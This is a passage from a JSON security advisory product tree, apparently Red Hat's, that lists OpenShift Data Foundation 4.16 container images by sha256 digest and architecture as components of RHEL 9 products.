"product_id": "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x"
},
"product_reference": "odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le"
},
"product_reference": "odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x"
},
"product_reference": "odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le"
},
"product_reference": "odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64"
},
"product_reference": "odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le"
},
"product_reference": "odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64"
},
"product_reference": "odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x"
},
"product_reference": "odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64"
},
"product_reference": "odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64"
},
"product_reference": "odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x"
},
"product_reference": "odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le"
},
"product_reference": "odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le"
},
"product_reference": "odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64"
},
"product_reference": "odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64"
},
"product_reference": "odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x"
},
"product_reference": "odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64"
},
"product_reference": "odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x"
},
"product_reference": "odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le"
},
"product_reference": "odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64"
},
"product_reference": "odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le"
},
"product_reference": "odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x"
},
"product_reference": "odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le"
},
"product_reference": "odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x"
},
"product_reference": "odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64"
},
"product_reference": "odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64"
},
"product_reference": "odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64"
},
"product_reference": "odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le"
},
"product_reference": "odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x"
},
"product_reference": "odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64"
},
"product_reference": "odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x"
},
"product_reference": "odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le"
},
"product_reference": "odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64"
},
"product_reference": "odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64"
},
"product_reference": "odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x"
},
"product_reference": "odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le"
},
"product_reference": "odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64"
},
"product_reference": "odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64"
},
"product_reference": "odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le"
},
"product_reference": "odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x"
},
"product_reference": "odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64"
},
"product_reference": "odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le"
},
"product_reference": "odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x"
},
"product_reference": "odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le"
},
"product_reference": "odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64"
},
"product_reference": "odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x"
},
"product_reference": "odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le"
},
"product_reference": "odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x"
},
"product_reference": "odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
